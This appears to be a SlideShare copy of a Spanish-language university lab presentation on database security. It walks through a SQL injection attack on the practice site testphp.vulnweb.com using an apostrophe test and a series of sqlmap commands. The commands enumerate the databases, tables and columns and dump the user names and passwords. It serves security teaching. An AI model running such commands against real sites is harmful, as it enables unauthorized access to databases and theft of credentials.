SlideShare una empresa de Scribd logo
1 de 15
Universidad Nacional Abierta y a Distancia 
(UNAD) 
SEGURIDAD EN BASES DE DATOS 
Ataque con inyección de código SQL a sitio web 
Grupo 233009_17
INTRODUCCIÓN 
• Un sistema de protección deberá tener la flexibilidad suficiente para poder 
imponer una diversidad de políticas y mecanismos. 
• Los ataques a las páginas web y las bases de datos son un tema critico de 
filtrado de información para cada organización, por ello debemos conocer 
cómo se realizan y su fin para así proteger y salvaguardar la información.
OBJETIVOS 
• Realizar ataque por inyección de código SQL a un sitio Web. 
• Identificar los posibles ataques a los cuales se puede exponer un sistema de 
información. 
• Conocer técnicas para detectar los posibles ataques a los sistemas de 
información
DESARROLLO DE LA ACTIVIDAD 
Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com , 
con lo cual se debe obtener toda la información sobre la base de datos por 
ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las 
tablas, información de las tablas, información de las columnas, etc.
Lo primero que debemos es definir de qué modo se realizará el 
ataque, ya sea por sistema operativo Linux o por Microsoft. 
Para este caso se realizará con Microsoft. 
Luego de definir el sistema para el ataque se procede a descargar un 
programa para realizar ataque por inyección de código SQL se sugiere 
SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el 
programa Pyntos
Una vez descargados se necesita que la carpeta comprimida de sqlmap sea 
instalada en el mismo lado o unidad como se observa en la imagen.
Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando 
el apostrofo ‘ al final de url. 
Url a validar: http://testphp.vulnweb.com
Una vez analizada y verificado el posible ataque a realizar, procedemos a 
ubicarnos en por línea de comandos en la carpeta sqlmap con el comando 
cd .., de la siguiente manera:
Y una vez ubicados en la carpeta sqlmap, 
comenzamos con la ejecución de comando. 
Ejecución de comando para averiguar nombre de la base de datos: 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –dbs
Ejecución de comando: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db ;para extraer 
información de la base de datos
Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
Comando para extraer las columnas de la base de datos: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns
Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
Comando para validar password: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump
FUENTES 
• http://datateca.unad.edu.co/contenidos/233009/Guia_de_componente_practico.p 
df 
• http://www.slideee.com/slide/ataque-por-inyeccion-de-codigo-sql-y-sniffing 
• https://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M

Más contenido relacionado

La actualidad más candente

La actualidad más candente (18)

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Metasploit
MetasploitMetasploit
Metasploit
 
Laboratorio linux
Laboratorio linuxLaboratorio linux
Laboratorio linux
 
T32
T32T32
T32
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04a
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertos
 
Instalación de XAMPP en Linux
Instalación de XAMPP en LinuxInstalación de XAMPP en Linux
Instalación de XAMPP en Linux
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00a
 
Ataque inyeccion sql
Ataque inyeccion sqlAtaque inyeccion sql
Ataque inyeccion sql
 
php
phpphp
php
 
Practica 1 unidad 4
Practica 1 unidad 4Practica 1 unidad 4
Practica 1 unidad 4
 
ZENMAP
ZENMAPZENMAP
ZENMAP
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
About debuggers.help
About debuggers.helpAbout debuggers.help
About debuggers.help
 
Crack Distribuido Atabuido
Crack Distribuido AtabuidoCrack Distribuido Atabuido
Crack Distribuido Atabuido
 
Comandos de linux
Comandos de linuxComandos de linux
Comandos de linux
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 

Destacado

Comocrearunmapamentalen spiderscribe
Comocrearunmapamentalen spiderscribeComocrearunmapamentalen spiderscribe
Comocrearunmapamentalen spiderscribeCarmenza Torres
 
Redes de datos Unad
Redes de datos UnadRedes de datos Unad
Redes de datos UnadJ Castaño
 
Rc deici castellanos
Rc deici castellanosRc deici castellanos
Rc deici castellanosDEICICB666
 
Trabajo colaborativo 2
Trabajo colaborativo 2Trabajo colaborativo 2
Trabajo colaborativo 2Oscar Ramos
 
Fase1 BD avanzada
Fase1 BD avanzada Fase1 BD avanzada
Fase1 BD avanzada leostave
 
Bases de datos relacionales mapa mental
Bases de datos relacionales mapa mentalBases de datos relacionales mapa mental
Bases de datos relacionales mapa mentalunacl20
 
Mapa conceptual 2
Mapa conceptual 2Mapa conceptual 2
Mapa conceptual 2Marijo80
 

Destacado (8)

Comocrearunmapamentalen spiderscribe
Comocrearunmapamentalen spiderscribeComocrearunmapamentalen spiderscribe
Comocrearunmapamentalen spiderscribe
 
Redes de datos Unad
Redes de datos UnadRedes de datos Unad
Redes de datos Unad
 
Rc deici castellanos
Rc deici castellanosRc deici castellanos
Rc deici castellanos
 
Trabajo colaborativo 2
Trabajo colaborativo 2Trabajo colaborativo 2
Trabajo colaborativo 2
 
Fase1 BD avanzada
Fase1 BD avanzada Fase1 BD avanzada
Fase1 BD avanzada
 
Mapa mental
Mapa mentalMapa mental
Mapa mental
 
Bases de datos relacionales mapa mental
Bases de datos relacionales mapa mentalBases de datos relacionales mapa mental
Bases de datos relacionales mapa mental
 
Mapa conceptual 2
Mapa conceptual 2Mapa conceptual 2
Mapa conceptual 2
 

Similar a Ataque sql web

Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONTensor
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitationTensor
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Carlos Alderete
 
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBMorely Garcia Leon
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendicesTensor
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTJose Gonzales
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeatCISObeat
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Alonso Caballero
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetraciónDavid Thomas
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Softwarelechosopowers
 

Similar a Ataque sql web (20)

Articulo ieee ataque_i
Articulo ieee ataque_iArticulo ieee ataque_i
Articulo ieee ataque_i
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1
 
Seguridad en la red
Seguridad en la redSeguridad en la red
Seguridad en la red
 
Hacking ético [Pentest]
Hacking ético [Pentest]Hacking ético [Pentest]
Hacking ético [Pentest]
 
Present3
Present3Present3
Present3
 
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
 
Inyecciones sql para aprendices
Inyecciones sql para aprendicesInyecciones sql para aprendices
Inyecciones sql para aprendices
 
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORTWebinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
Webinar CISOBeat - Detectar Ataques de Red Utilizando SNORT
 
Backtrak guide
Backtrak guideBacktrak guide
Backtrak guide
 
Owasp proyecto
Owasp proyectoOwasp proyecto
Owasp proyecto
 
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat¿Cómo detectar ataques de red utilizando Snort? | CISObeat
¿Cómo detectar ataques de red utilizando Snort? | CISObeat
 
Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0Samurai Web Testing Framework 2.0
Samurai Web Testing Framework 2.0
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetración
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Vulnerabilidades del Software
Vulnerabilidades del SoftwareVulnerabilidades del Software
Vulnerabilidades del Software
 

Último

Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularMooPandrea
 
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxTECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxKarlaMassielMartinez
 
Éteres. Química Orgánica. Propiedades y reacciones
Éteres. Química Orgánica. Propiedades y reaccionesÉteres. Química Orgánica. Propiedades y reacciones
Éteres. Química Orgánica. Propiedades y reaccionesLauraColom3
 
Ecosistemas Natural, Rural y urbano 2021.pptx
Ecosistemas Natural, Rural y urbano  2021.pptxEcosistemas Natural, Rural y urbano  2021.pptx
Ecosistemas Natural, Rural y urbano 2021.pptxolgakaterin
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioELIASAURELIOCHAVEZCA1
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfNancyLoaa
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxMaritzaRetamozoVera
 
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxlclcarmen
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dstEphaniiie
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxzulyvero07
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaDecaunlz
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfPaolaRopero2
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...JonathanCovena1
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.amayarogel
 

Último (20)

Medición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptxMedición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptx
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circular
 
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxTECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
 
Éteres. Química Orgánica. Propiedades y reacciones
Éteres. Química Orgánica. Propiedades y reaccionesÉteres. Química Orgánica. Propiedades y reacciones
Éteres. Química Orgánica. Propiedades y reacciones
 
Ecosistemas Natural, Rural y urbano 2021.pptx
Ecosistemas Natural, Rural y urbano  2021.pptxEcosistemas Natural, Rural y urbano  2021.pptx
Ecosistemas Natural, Rural y urbano 2021.pptx
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literario
 
Sesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronósticoSesión de clase: Fe contra todo pronóstico
Sesión de clase: Fe contra todo pronóstico
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdf
 
Unidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la InvestigaciónUnidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la Investigación
 
Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docx
 
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes d
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativa
 
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdfGUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
GUIA DE CIRCUNFERENCIA Y ELIPSE UNDÉCIMO 2024.pdf
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...
 
La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.La triple Naturaleza del Hombre estudio.
La triple Naturaleza del Hombre estudio.
 

Ataque sql web

  • 1. Universidad Nacional Abierta y a Distancia (UNAD) SEGURIDAD EN BASES DE DATOS Ataque con inyección de código SQL a sitio web Grupo 233009_17
  • 2. INTRODUCCIÓN • Un sistema de protección deberá tener la flexibilidad suficiente para poder imponer una diversidad de políticas y mecanismos. • Los ataques a las páginas web y las bases de datos son un tema critico de filtrado de información para cada organización, por ello debemos conocer cómo se realizan y su fin para así proteger y salvaguardar la información.
  • 3. OBJETIVOS • Realizar ataque por inyección de código SQL a un sitio Web. • Identificar los posibles ataques a los cuales se puede exponer un sistema de información. • Conocer técnicas para detectar los posibles ataques a los sistemas de información
  • 4. DESARROLLO DE LA ACTIVIDAD Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com , con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
  • 5. Lo primero que debemos es definir de qué modo se realizará el ataque, ya sea por sistema operativo Linux o por Microsoft. Para este caso se realizará con Microsoft. Luego de definir el sistema para el ataque se procede a descargar un programa para realizar ataque por inyección de código SQL se sugiere SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el programa Pyntos
  • 6. Una vez descargados se necesita que la carpeta comprimida de sqlmap sea instalada en el mismo lado o unidad como se observa en la imagen.
  • 7. Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando el apostrofo ‘ al final de url. Url a validar: http://testphp.vulnweb.com
  • 8. Una vez analizada y verificado el posible ataque a realizar, procedemos a ubicarnos en por línea de comandos en la carpeta sqlmap con el comando cd .., de la siguiente manera:
  • 9. Y una vez ubicados en la carpeta sqlmap, comenzamos con la ejecución de comando. Ejecución de comando para averiguar nombre de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –dbs
  • 10. Ejecución de comando: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db ;para extraer información de la base de datos
  • 11. Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
  • 12. Comando para extraer las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns
  • 13. Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
  • 14. Comando para validar password: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump
  • 15. FUENTES • http://datateca.unad.edu.co/contenidos/233009/Guia_de_componente_practico.p df • http://www.slideee.com/slide/ataque-por-inyeccion-de-codigo-sql-y-sniffing • https://www.youtube.com/watch?feature=player_embedded&v=_wwYuilkn8M